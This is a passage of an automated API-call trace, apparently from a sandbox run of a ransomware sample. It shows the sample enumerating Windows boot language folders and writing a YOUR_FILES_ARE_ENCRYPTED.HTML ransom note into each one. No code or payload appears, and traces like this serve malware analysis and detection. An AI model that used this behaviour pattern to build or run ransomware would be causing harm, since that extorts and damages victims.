RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.156] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\nb-NO" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO") returned="\\\\?\\C:\\Boot\\nb-NO" [0155.156] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\nb-NO", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO\\*") returned="\\\\?\\C:\\Boot\\nb-NO\\*" [0155.156] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.158] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.158] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.158] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 33 [0155.158] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.158] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.158] lstrlenW (lpString=".mui") returned 4 [0155.158] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.158] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.158] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.158] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.158] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\nb-no\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.159] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.161] CloseHandle (hObject=0x4a4) returned 1 [0155.161] GetProcessHeap () returned 0x270000 [0155.162] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.162] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0155.162] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL") returned 17 [0155.162] GetProcessHeap () returned 0x270000 [0155.162] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.162] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\nl-NL" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL") returned="\\\\?\\C:\\Boot\\nl-NL" [0155.162] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\nl-NL", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL\\*") returned="\\\\?\\C:\\Boot\\nl-NL\\*" [0155.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.162] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.162] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.162] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 33 [0155.162] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.162] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.162] lstrlenW (lpString=".mui") returned 4 [0155.162] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.163] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.163] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.163] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.163] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\nl-nl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.163] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.165] CloseHandle (hObject=0x4a4) returned 1 [0155.165] GetProcessHeap () returned 0x270000 [0155.166] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.166] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0155.166] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL") returned 17 [0155.166] GetProcessHeap () returned 0x270000 [0155.166] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.166] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\pl-PL" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL") returned="\\\\?\\C:\\Boot\\pl-PL" [0155.166] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pl-PL", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL\\*") returned="\\\\?\\C:\\Boot\\pl-PL\\*" [0155.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.168] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.168] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.168] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 33 [0155.168] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.168] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.168] lstrlenW (lpString=".mui") returned 4 [0155.168] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.168] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.168] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.168] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.168] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\pl-pl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.169] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.171] CloseHandle (hObject=0x4a4) returned 1 [0155.171] GetProcessHeap () returned 0x270000 [0155.172] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.172] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44ffd5e0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0155.172] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR") returned 17 [0155.172] GetProcessHeap () returned 0x270000 [0155.172] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.172] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\pt-BR" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR") returned="\\\\?\\C:\\Boot\\pt-BR" [0155.173] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pt-BR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR\\*") returned="\\\\?\\C:\\Boot\\pt-BR\\*" [0155.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44ffd5e0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.173] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44ffd5e0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.173] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.173] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 33 [0155.173] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.173] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.173] lstrlenW (lpString=".mui") returned 4 [0155.173] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.173] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.173] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.173] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.173] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\pt-br\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.174] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.176] CloseHandle (hObject=0x4a4) returned 1 [0155.176] GetProcessHeap () returned 0x270000 [0155.177] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.177] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44ffd5e0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0155.177] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT") returned 17 [0155.177] GetProcessHeap () returned 0x270000 [0155.177] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.177] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\pt-PT" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT") returned="\\\\?\\C:\\Boot\\pt-PT" [0155.177] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pt-PT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT\\*") returned="\\\\?\\C:\\Boot\\pt-PT\\*" [0155.177] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44ffd5e0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.178] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44ffd5e0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.178] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.178] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 33 [0155.178] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.178] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.178] lstrlenW (lpString=".mui") returned 4 [0155.178] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.178] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44ffd5e0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.178] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.179] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.179] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\pt-pt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.179] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.181] CloseHandle (hObject=0x4a4) returned 1 [0155.181] GetProcessHeap () returned 0x270000 [0155.182] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.182] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x45023740, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0155.182] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU") returned 17 [0155.182] GetProcessHeap () returned 0x270000 [0155.182] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.182] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\ru-RU" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU") returned="\\\\?\\C:\\Boot\\ru-RU" [0155.182] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ru-RU", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU\\*") returned="\\\\?\\C:\\Boot\\ru-RU\\*" [0155.182] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4e20a0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x45023740, 